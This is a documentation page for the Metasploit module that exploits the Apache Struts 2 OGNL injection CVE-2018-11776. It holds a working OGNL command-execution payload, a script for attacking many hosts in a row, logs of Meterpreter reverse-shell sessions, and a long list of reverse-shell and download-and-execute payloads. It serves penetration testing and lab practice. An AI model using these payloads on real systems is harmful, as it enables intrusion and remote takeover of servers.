Apache Struts 2 Namespace Redirect OGNL Injection - Metasploit
This page contains detailed information about how to use the exploit/multi/http/struts2_namespace_ognl metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Apache Struts 2 Namespace Redirect OGNL Injection
Module: exploit/multi/http/struts2_namespace_ognl
Source code: modules/exploits/multi/http/struts2_namespace_ognl.rb
Disclosure date: 2018-08-22
Last modification time: 2018-12-14 13:08:50 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2018-11776
This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependant on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Using struts2_namespace_ognl against a single host
Normally, you can use exploit/multi/http/struts2_namespace_ognl this way:
msf > use exploit/multi/http/struts2_namespace_ognl
msf exploit(struts2_namespace_ognl) > show targets
... a list of targets ...
msf exploit(struts2_namespace_ognl) > set TARGET target-id
msf exploit(struts2_namespace_ognl) > show options
... show and set options ...
msf exploit(struts2_namespace_ognl) > exploit
Using struts2_namespace_ognl against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your struts2_namespace_ognl will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/multi/http/struts2_namespace_ognl")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
CVE-2018-11776 is a critical vulnerability in the way Apache Struts2 handles namespaces and redirection, which permits an attacker to execute [OGNL(https://commons.apache.org/proper/commons-ognl/language-guide.html) remotely. Using OGNL, the attacker can modify files and execute commands.
The vulnerability was reported to Apache by [Man Yue Mo] from Semmle in April 2018. It was widely publicized in August 2018, with PoCs appearing shortly thereafter.
Tomcat versions prior to 7.0.88 will provide output from the injected OGNL and require that we prepend some OGNL to set allowStaticMethodAccess=true
. Versions starting at 7.0.88 do not provide OUTPUT from injected OGNL and will error if we attempt to modify allowStaticMethodAccess
. The ENABLE_STATIC
option is used to toggle behavior, and the check
method fingerprints the correct version.
As a result of the lack of OGNL output, we currently cannot support large payloads (namely Windows Meterpreter payloads) on Tomcat versions >= 7.088. Future committers might consider compressing the windows/x64/meterpreter templates or implementing GZIP compression of payloads.
Vulnerable Application
The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliably as a practice environment. @hook-s3c did an amazing job with their writeup, which I'll include excerpts of here:
From a stock Ubuntu VM, install docker:
sudo apt update && sudo apt install docker.io
Download a vulnerable Struts showcase application inside a docker container:
sudo docker pull piesecurity/apache-struts2-cve-2017-5638 sudo docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638 CONTAINER_ID=`sudo docker ps -l -q`
Now that the container is running, open a terminal inside of it:
sudo docker exec -it $CONTAINER_ID /bin/bash
From within the container, install your text editor of choice and modify the Struts configs:
sudo apt update && sudo apt install nano nano /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
Update the struts config to add this to above line #11:
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
Update the same struts config file to add this above line #78:
<action name="help"> <result type="redirectAction"> <param name="actionName">date.action</param> </result> </action>
Still within the container, shutdown the environment:
/usr/local/tomcat/bin/shutdown.sh
Upon completion, the container will shutdown and you'll return to the host environment. Restart the container, now with a vulnerable endpoint:
sudo docker start $CONTAINER_ID
Congratulations. You now have a vulnerable Struts server. If you're following these instructions, your server should be listening on 0.0.0.0:32771. To confirm:
INTERFACE=`ip route list 0.0.0.0/0 | cut -d' ' -f5`
IPADDRESS=`ip addr show $INTERFACE | grep -Po 'inet \K[\d.]+'`
PORT_NUM=`sudo docker port $CONTAINER_ID | sed 's/.*://'`
echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
Verification Steps
Confirm that check functionality works:
- [ ] Install the application using the steps above.
- [ ] Start msfconsole.
- [ ] Load the module:
use exploit/multi/http/struts_namespace_ognl
- [ ] Set the RHOST.
- [ ] Set an invalid ACTION:
set ACTION wrong.action
- [ ] Confirm the target is not vulnerable:
check
- [ ] Observe that the target is not vulnerable:
The target is not exploitable.
- [ ] Set a valid ACTION:
set ACTION help.action
- [ ] Confirm that the target is vulnerable:
The target is vulnerable.
Confirm that command execution functionality works:
- [ ] Set a payload:
set PAYLOAD cmd/unix/generic
- [ ] Set a command to be run:
set CMD hostname
- [ ] Run the exploit:
run
- [ ] Confirm the output is the container ID of your docker environment, e.g:
b3d9b350d9b6
- [ ] You will not be given a shell (yet).
Confirm that payload upload and execution works:
- [ ] Set a payload, e.g.:
set PAYLOAD linux/x64/meterpreter/reverse_tcp
- [ ] Configure
LHOST
andRHOST
as necessary. - [ ] Run the exploit:
run
Options
TARGETURI
The path to the struts application. Note that this does not include the endpoint. In the environment above, the path is /
.
ACTION
The endpoint name. In the environment above, the endpoint is help.action
.
Scenarios
Version of software and OS as applicable
Checking a vulnerable endpoint, as installed in the above steps:
msf > use exploit/multi/http/struts_namespace_ognl
msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135
msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771
msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action
ACTION => help.action
msf5 exploit(multi/http/struts_namespace_ognl) > check
[+] 192.168.199.135:32771 The target is vulnerable.
Running an arbitrary command on the above-described environment:
msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true
msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf5 exploit(multi/http/struts_namespace_ognl) > set CMD hostname
CMD => hostname
msf5 exploit(multi/http/struts_namespace_ognl) > run
[*] Submitted OGNL: (#_memberAccess['allowStaticMethodAccess']=true).(#cmd='hostname').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())
[*] Command ran. Output from command:
b3d9b350d9b6
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/struts_namespace_ognl) >
Getting a Meterpreter session on the above-described environment:
msf5 > use exploit/multi/http/struts2_namespace_ognl
msf5 exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action
msf5 exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135
msf5 exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771
msf5 exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
msf5 exploit(multi/http/struts2_namespace_ognl) > run
[*] Started reverse TCP handler on 192.168.199.134:4444
[+] Target profiled successfully: Linux 4.4.0-112-generic amd64, running as root
[+] Payload successfully dropped and executed.
[*] Sending stage (816260 bytes) to 192.168.199.135
[*] Meterpreter session 1 opened (192.168.199.134:4444 -> 192.168.199.135:47482) at 2018-08-31 13:15:22 -0500
meterpreter >
Go back to menu.
Msfconsole Usage
Here is how the multi/http/struts2_namespace_ognl exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/struts2_namespace_ognl
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_namespace_ognl) > show info
Name: Apache Struts 2 Namespace Redirect OGNL Injection
Module: exploit/multi/http/struts2_namespace_ognl
Platform:
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2018-08-22
Provided by:
Man Yue Mo
hook-s3c
asoto-r7
wvu <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic detection
1 Windows
2 Linux
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ACTION showcase.action yes A valid endpoint that is configured as a redirect action
ENABLE_STATIC true yes Enable "allowStaticMethodAccess" before executing OGNL
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes A valid base path to a struts application
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits a remote code execution vulnerability in Apache
Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution
can be performed via an endpoint that makes use of a redirect
action. Note that this exploit is dependant on the version of Tomcat
running on the target. Versions of Tomcat starting with 7.0.88
currently don't support payloads larger than ~7.5kb. Windows
Meterpreter sessions on Tomcat >=7.0.88 are currently not supported.
Native payloads will be converted to executables and dropped in the
server's temp dir. If this fails, try a cmd/* payload, which won't
have to write to the disk.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-11776
https://lgtm.com/blog/apache_struts_CVE-2018-11776
https://cwiki.apache.org/confluence/display/WW/S2-057
https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
Module Options
This is a complete list of options available in the multi/http/struts2_namespace_ognl exploit:
msf6 exploit(multi/http/struts2_namespace_ognl) > show options
Module options (exploit/multi/http/struts2_namespace_ognl):
Name Current Setting Required Description
---- --------------- -------- -----------
ACTION showcase.action yes A valid endpoint that is configured as a redirect action
ENABLE_STATIC true yes Enable "allowStaticMethodAccess" before executing OGNL
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes A valid base path to a struts application
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic detection
Advanced Options
Here is a complete list of advanced options supported by the multi/http/struts2_namespace_ognl exploit:
msf6 exploit(multi/http/struts2_namespace_ognl) > show advanced
Module advanced options (exploit/multi/http/struts2_namespace_ognl):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HEADER X-yOIU yes The HTTP header field used to transport the optional payload
HTTPMethod GET yes The HTTP method to send in the request. Cannot contain spaces
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
TEMPFILE AUeSnYyd yes The temporary filename written to disk when executing a payload
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugLevel 0 yes Set debug level for meterpreter 0-3 (Default output is strerr)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root)
PrependFork false no Prepend a stub that starts the payload in its own process via fork
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
RemoteMeterpreterDebugFile no Redirect Debug Info to a Log File
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/struts2_namespace_ognl module can exploit:
msf6 exploit(multi/http/struts2_namespace_ognl) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic detection
1 Windows
2 Linux
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/struts2_namespace_ognl exploit:
msf6 exploit(multi/http/struts2_namespace_ognl) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
8 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
15 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
16 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
17 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
18 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
19 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
20 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
21 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
22 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
23 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
24 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
25 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
26 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
27 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
28 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
29 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
30 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
31 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
32 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
33 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
34 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
35 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
36 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
37 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
38 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
39 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
40 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
41 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
42 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
43 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
44 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
45 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
46 payload/cmd/windows/adduser normal No Windows Execute net user /ADD CMD
47 payload/cmd/windows/bind_lua normal No Windows Command Shell, Bind TCP (via Lua)
48 payload/cmd/windows/bind_perl normal No Windows Command Shell, Bind TCP (via Perl)
49 payload/cmd/windows/bind_perl_ipv6 normal No Windows Command Shell, Bind TCP (via perl) IPv6
50 payload/cmd/windows/bind_ruby normal No Windows Command Shell, Bind TCP (via Ruby)
51 payload/cmd/windows/download_eval_vbs normal No Windows Executable Download and Evaluate VBS
52 payload/cmd/windows/download_exec_vbs normal No Windows Executable Download and Execute (via .vbs)
53 payload/cmd/windows/generic normal No Windows Command, Generic Command Execution
54 payload/cmd/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
55 payload/cmd/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
56 payload/cmd/windows/reverse_lua normal No Windows Command Shell, Reverse TCP (via Lua)
57 payload/cmd/windows/reverse_perl normal No Windows Command, Double Reverse TCP Connection (via Perl)
58 payload/cmd/windows/reverse_powershell normal No Windows Command Shell, Reverse TCP (via Powershell)
59 payload/cmd/windows/reverse_ruby normal No Windows Command Shell, Reverse TCP (via Ruby)
60 payload/generic/custom normal No Custom Payload
61 payload/generic/debug_trap normal No Generic x86 Debug Trap
62 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
63 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
64 payload/generic/tight_loop normal No Generic x86 Tight Loop
65 payload/linux/x64/exec normal No Linux Execute Command
66 payload/linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
67 payload/linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
68 payload/linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
69 payload/linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
70 payload/linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
71 payload/linux/x64/pingback_bind_tcp normal No Linux x64 Pingback, Bind TCP Inline
72 payload/linux/x64/pingback_reverse_tcp normal No Linux x64 Pingback, Reverse TCP Inline
73 payload/linux/x64/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager
74 payload/linux/x64/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
75 payload/linux/x64/shell_bind_ipv6_tcp normal No Linux x64 Command Shell, Bind TCP Inline (IPv6)
76 payload/linux/x64/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
77 payload/linux/x64/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
78 payload/linux/x64/shell_reverse_ipv6_tcp normal No Linux x64 Command Shell, Reverse TCP Inline (IPv6)
79 payload/linux/x64/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
80 payload/linux/x86/chmod normal No Linux Chmod
81 payload/linux/x86/exec normal No Linux Execute Command
82 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
83 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
84 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
85 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
86 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
87 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
88 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
89 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
90 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
91 payload/linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
92 payload/linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
93 payload/linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
94 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
95 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
96 payload/linux/x86/read_file normal No Linux Read File
97 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
98 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
99 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
100 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
101 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
102 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
103 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
104 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
105 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
106 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
107 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
108 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
109 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
110 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
111 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
112 payload/windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
113 payload/windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
114 payload/windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
115 payload/windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
116 payload/windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
117 payload/windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
118 payload/windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
119 payload/windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
120 payload/windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
121 payload/windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
